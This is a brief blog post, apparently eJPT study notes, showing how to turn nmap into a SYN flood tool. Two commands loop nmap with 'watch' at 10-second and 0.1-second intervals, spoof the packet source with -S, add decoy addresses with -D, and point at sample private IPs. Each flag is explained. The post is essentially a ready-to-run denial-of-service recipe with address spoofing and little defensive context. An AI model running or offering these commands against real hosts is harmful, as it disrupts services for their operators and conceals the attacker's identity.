Thursday, May 7, 2020

[eJPT][nmap]Apply Nmap to Synflood

Example #1 Command:
#watch -n 10 "nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251"

-e wlan0: Specify the network adapter sending the packets.
-Pn: There is no need to PING before launching the scan.
-T5: The fastest rate.
-S 192.168.0.253: Spoofing the packet source as 192.168.0.253.
192.168.0.251: The target.
The nmap scan would be repeatedly launched every 10 seconds by using the watch command.


Example #2 Command:
#watch -n 0.1 "nmap -e eth0 -T5 -p443 -D 12.0.0.1,12.0.0.2,12.0.0.3,RND,ME,RND 10.10.77.245"

-e eth0: Specify the network adapter sending the packets.
-T5: The fastest rate.
-p443: Scan TCP443 port of the target.
-D 12.0.0.1,12.0.0.2,12.0.0.3,RND,ME,RND: Spoofing the packet sources as 12.0.0.1, 12.0.0.2, 12.0.0.3, a random IP, my own IP, and another random IP.
10.10.77.245: The target.
The nmap scan would be repeatedly launched every 0.1 second by using the watch command.

No comments:

Post a Comment